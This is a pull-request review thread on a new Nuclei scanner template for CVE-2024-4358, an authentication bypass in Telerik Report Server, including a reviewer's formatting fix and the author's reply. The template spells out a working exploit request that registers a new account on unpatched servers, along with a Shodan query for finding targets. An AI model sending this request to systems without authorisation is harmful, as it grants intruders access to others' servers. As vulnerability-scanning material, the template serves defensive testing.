nuclei/CVE-2024-4358.yaml

```
@@ -0,0 +1,60 @@
+id: CVE-2024-4358
+
+info:
+  name: Progress Telerik Report Server - Authentication Bypass
+  author: DhiyaneshDK
+  severity: critical
+  description: |
+    In Progress Telerik Report Server, version 2024 Q1 (10.0.24.305) or earlier, on IIS, an unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability.
+  impact: An unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability.
+  remediation: Updating to Report Server 2024 Q2 (10.1.24.514) or later.
+  reference:
+    - https://summoning.team/blog/progress-report-server-rce-cve-2024-4358-cve-2024-1800/
+    - https://github.com/sinsinology/CVE-2024-4358
+    - https://docs.telerik.com/report-server/knowledge-base/registration-auth-bypass-cve-2024-4358
+  metadata:
+    shodan-query: title:"Log in | Telerik Report Server"
+    verified: true
+    max-request: 2
+  tags: cve,cve2024,telerik,progress,auth-bypass,instrusive
+
+variables:
+  user: "{{rand_base(6)}}"
+  pass: "{{rand_base(8)}}"
+  email: "{{randstr}}@{{rand_base(5)}}.com"
+  firstname: "{{rand_base(5)}}"
+  lastname: "{{rand_base(5)}}"
+
+http:
+  - raw:
+      - |
+        POST /Startup/Register HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Username={{user}}&Password={{pass}}&ConfirmPassword={{pass}}&Email={{email}}&FirstName={{firstname}}&LastName={{lastname}}
```

```suggestion
        Content-Type: application/x-www-form-urlencoded
        
        Username={{user}}&Password={{pass}}&ConfirmPassword={{pass}}&Email={{email}}&FirstName={{firstname}}&LastName={{lastname}}
``` 
it's good from the template just get the original and it will be good to go , and If you can test the template will be better

---

Okay, got it!